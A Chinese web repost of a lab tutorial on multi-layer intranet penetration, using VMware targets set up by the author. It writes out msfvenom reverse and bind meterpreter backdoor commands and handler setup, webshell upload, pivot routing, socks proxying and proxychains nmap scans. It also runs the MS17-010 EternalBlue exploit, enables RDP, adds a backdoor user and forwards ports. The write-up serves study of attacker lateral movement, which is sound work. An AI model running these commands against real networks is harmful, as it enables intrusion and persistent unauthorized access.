您当前的位置:首页 > 电脑百科 > 网络技术 > 网络安全

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

时间:2021-07-07 10:58:39  来源:  作者:KaliMa

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 


近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。

1.实验简介

网络拓扑图

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

渗透机:win10+kali

第一层靶机 (外网web服务器): linux

第二场靶机 (内网web服务器): Linux

第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解MSF、内网转发等。

2.环境搭建

第一层网络

把渗透机kali和win10网卡1设置选择V.NET1:

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 


靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

第二层网络

将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

第三层网络

将靶机win7网卡1设置选择VMnet3:

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

再配置好各台机器对应IP即可。

最后

在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透。

第一台Linux

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

第二台Linux

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

3.实验过程

第一层靶机

win10访问http://192.168.85.131/直接上传一句话木马

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

蚁剑连接

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 


我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

进一步做内网渗透,上传msf后门

打开kali msfconsole 输入msfvenom -p
linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为mshell.elf的msf后门文件

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

蚁剑把后门文件上传到Linux靶机

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

返回msf 开启监听

use exploit/multi/handler 使用监听模块
set payload
linux/x64/meterpreter/reverse_tcp 使用和木马相同的payload
set lhost 192.168.85.128 kaili 的ip
set lport 4444 木马的端口
run 执行

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 


蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入

chmod 777 mshell.elf 加执行权限
./mshell.elf 执行文件

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

Kail接受到MSF会话

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

输入ifconfig,发现第二层172.10.10.0/24网段

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

添加路由

background 将会话转到后台
route add 172.10.10.0/24 1
添加 172.10.10.0/24网段 使用session1
route print 查看路由表

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

使用MSF建立socks代理

use auxiliary/server/socks4a
set srvhost 192.168.85.128
set srvport 10080
run

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

配置socks4代理的相关客户端Proxychains
在配置文件/etc/proxychains.conf中添加:
socks4 192.168.85.128 10080
vi /etc/proxychains.conf

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

添加socks4 192.168.85.128 10080

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

这样利用proxychains启动的应用都可以带sock4代理,proxychains 为kali自带的,非MSF里的。

建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络

第二层网络

nmap探测存在web服务的主机

用proxychans启动nmap对第二层网段进行80端口扫描,执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

由于proxychains无法代理icmp的数据包,所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。

脚本探测存活主机

在本地创建一个名为ping.sh的脚本,脚本内容如下:

#!/bin/bash
ip=”172.10.10.”
echo “ping log:” > ./ping.txt
for i in {1..254}
do
ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &
done
echo “wait 5s….”
sleep 5
cat ./ping.txt
cat ./ping.txt | wc -l
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

Kali进入session1会话,然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

进入shell执行

Python/ target=_blank class=infotextkey>Python -c ‘import pty;pty.spawn(“/bin/bash”)’

创建一个完全交互式shell,后

Chmod 777 ping.sh
./ping.sh

可以看到172.10.10.0/24网段存活56.57两台

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

知道存活主机ip后就可以继续进入第二层内网主机

渗透机浏览器配置sock4a代理

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 


我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

蚁剑加代理连接

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

连接
http://172.10.10.56/upload/php1.php

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

进一步做内网渗透,继续上传msf后门

制作MSF后门

返回kali msf 输入

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

生成 mshell1.elf后门文件

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

因为在内网跨网段时无法反向代理连接到渗透的机器,所以这里使用
linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。
蚁剑上传后门

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 


我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

蚁剑打开虚拟终端执行后门文件

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 


返回会话

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

输入ifconfig 发现第三层网络的网段10.10.10.0/24

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

第三层网络

添加路由

background
route add 10.10.10.0/24 2
route print

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

进入session 2 上传 脚本 探测存活主机
注意把脚本的ip段修改成该网段再上传

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

探测到第三层网段的存活ip :10.10.10.101

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

proxychans 启动nmap对10.10.10.101的1-500端口扫描,执行
proxychains nmap -sT -Pn -p 1-500 10.10.10.101

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

发现445端口开启

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

尝试使用ms17-010
use
windows/smb/ms17_010_eternalblue
set rhost 10.10.10.101
set payload
windows/x64/meterpreter/bind_tcp
set lport 4466

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

Run ,存在445漏洞

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

执行成功,返回会话

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

开启3389远程桌面

run
post/windows/manage/enable_rdp 开启远程桌面
run
post/windows/manage/enable_rdp USERNAME=zzy PASSword=123qwe!@# 添加远程用户

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

将3389端口转回kali本地5555端口
portfwd add -l 5555 -p 3389 -r 10.10.10.101

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

Win10远程桌面连接

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

登陆成功

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

 

 


Tags:内网渗透   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
0x00 前言一个完整的内网渗透过程。0x01 案例分析实验环境: 目标环境:10.0.0.0/24, 10.0.1.0/24 攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Windows)渗透过程:基本的主机探测:root@ka...【详细内容】
2022-04-30  Tags: 内网渗透  点击:(236)  评论:(0)  加入收藏
拓扑环境 Kali Linux(攻击机) Centos6.4(web服务器) win7(域成员主机无法上网) win2008R2(域控无法上网) 目的通过Kali Linux拿到域控权限2021最新整理网络安全\渗透测试/安全学习(全...【详细内容】
2021-09-17  Tags: 内网渗透  点击:(429)  评论:(0)  加入收藏
前言这又是一个关于域内基础概念与原理的系列Active Directory 的查询基础语法BaseDNBaseDN 即基础可分辨名称,其指定了这棵树的根。比如指定 BaseDN 为DC=whoamianony,DC=or...【详细内容】
2021-09-06  Tags: 内网渗透  点击:(182)  评论:(0)  加入收藏
近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻...【详细内容】
2021-07-07  Tags: 内网渗透  点击:(241)  评论:(0)  加入收藏
前言前段时间读了读徐哥的《内网安全攻防》,并复现了部分知识点,写篇文章记录下学习内容。何为隐藏通信隧道技术?意义当我们成功杀入内网并完成信息收集后,下一步要进行的就是判...【详细内容】
2021-06-22  Tags: 内网渗透  点击:(178)  评论:(0)  加入收藏
最近在某地方举行攻防演练的时候进入后台管理拿到了一个 webshell,但是 tasklist /svc 查看进程 360、电脑管家赫然在列,我的小伙伴本来准备使用注入 dll 来达到上线 cs 多人...【详细内容】
2021-05-21  Tags: 内网渗透  点击:(405)  评论:(0)  加入收藏
作者:诺言 转载自:https://www.freebuf.com/articles/web/247287.html前言最近打了几场**,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧。socks隧道搭建常用...【详细内容】
2020-08-27  Tags: 内网渗透  点击:(1213)  评论:(0)  加入收藏
在渗透测试中,有些工具的运行(例如高版本的Powershell)需要依赖Microsoft .NET Framework 4.0的环境。 而默认配置下,Win7不支持Microsoft .NET Framework 4.0。为了保证工具...【详细内容】
2020-07-03  Tags: 内网渗透  点击:(221)  评论:(0)  加入收藏
偶尔适度的放纵一下,是为了继续道貌岸然的生活,太急了会没有故事,太缓了会没有人生。。。。---- 网易云热评环境:小攻:Kali 2020,ip:192.168.1.133小受:win7 x86,ip:192.168.1.137一、...【详细内容】
2020-07-03  Tags: 内网渗透  点击:(128)  评论:(0)  加入收藏
内网渗透完成信息收集后,流量是否能够正常进出,是内网渗透中需要考虑的地方之一​ ICMP(Internet ControllerMessages Protocol,网间控制报文协议)是TCP/IP协议族的子协议,是一...【详细内容】
2020-06-21  Tags: 内网渗透  点击:(300)  评论:(0)  加入收藏
▌简易百科推荐
在无锡的一家电子元器件生产基地,这里被世界经济论坛评选为“灯塔工厂”。可以像乐高积木一样组合拼装的柔性生产线,无论是降低产线投资还是缩短产品上市时间,以数字化重构端到...【详细内容】
2022-11-03  智会社  搜狐号  Tags:安全   点击:(4)  评论:(0)  加入收藏
浏览器劫持是一种恶意程序,通过浏览器插件、BHO(浏览器辅助对象)、Winsock LSP等形式对用户的浏览器进行篡改,使用户的浏览器配置不正常,被强行引导到商业网站。所谓浏览器劫持是...【详细内容】
2022-11-03  数影星球    Tags:浏览器劫持   点击:(2)  评论:(0)  加入收藏
浏览器漏洞存在是由于编程人员的能力、经验和当时安全技术所限,在程序中难免会有不足之处。在设计时未考虑周全,当程序遇到一个看似合理,但实际无法处理的问题时,引发的不可预见...【详细内容】
2022-11-02  数影星球  搜狐号  Tags:浏览器   点击:(0)  评论:(0)  加入收藏
所谓计算机网络系统自身的漏洞主要指的是计算机网络的不安全服务、配置以及初始化。如果系统在这些方面存在漏洞,就极易造成计算机网络系统的瘫痪,对网络造成不可估量的威胁。...【详细内容】
2022-10-27  Metaverse漫游  搜狐号  Tags:网络安全   点击:(9)  评论:(0)  加入收藏
1、Hydra网络服务密码破解工具,支持30多种常见网络协议或服务的破解,AFP、Cisco AAA认证、FTP、HTTP、POP3/SNMP/SSH/Telnet密码字典路径hydra 192.168.8.128 ssh -l root -p...【详细内容】
2022-10-24  可爱的雪人童话  今日头条  Tags:身份认证攻击   点击:(11)  评论:(0)  加入收藏
本文将介绍您可能想学习的前 10 种编码语言,以启动您的网络安全事业。每日分享最新,最流行的软件开发知识与最新行业趋势,希望大家能够一键三连,多多支持,跪求关注,点赞,留言。 人...【详细内容】
2022-10-06  qaseven     Tags:网络安全   点击:(25)  评论:(0)  加入收藏
前言:蜜罐技术的出现改变了这种被动态势,它通过吸引、诱骗攻击者,研究学习攻击者的攻击目的和攻击手段,从而延缓乃至阻止攻击破坏行为的发生,有效保护真实服务资源。自网络诞生以...【详细内容】
2022-09-28  埃文科技    Tags:蜜罐技术   点击:(30)  评论:(0)  加入收藏
【环球时报-环球网报道 记者 袁宏】《环球时报》记者从有关部门独家获悉,美国国家安全局(NSA)“特定入侵行动办公室”(TAO)在对西北工业大学发起网络攻击的过程中构建了对中国电...【详细内容】
2022-09-22    环球网   Tags:网络攻击   点击:(43)  评论:(0)  加入收藏
近年,高达82%的IP流量将来自视频,2/3的网络流量将来自无线网络和移动设备。随着视频业务的不断演进,如提供超高清4K-8K视频、虚拟(VR)/增强现实(AR)等,也将推动未来5G网络的设计,更好...【详细内容】
2022-09-19    认知计算与云安全  Tags:安全网络   点击:(59)  评论:(0)  加入收藏
2022年在合肥举办的国家网络安全宣传周网络全博览会上,国盾量子和科大讯飞还联合推出了一种让保障我们老百姓切身利益的黑科技,它就是量子加密通话技术。它就像一个电子笔记本...【详细内容】
2022-09-18  成长点滴  今日头条  Tags:信息加密   点击:(61)  评论:(0)  加入收藏
站内最新
站内热门
站内头条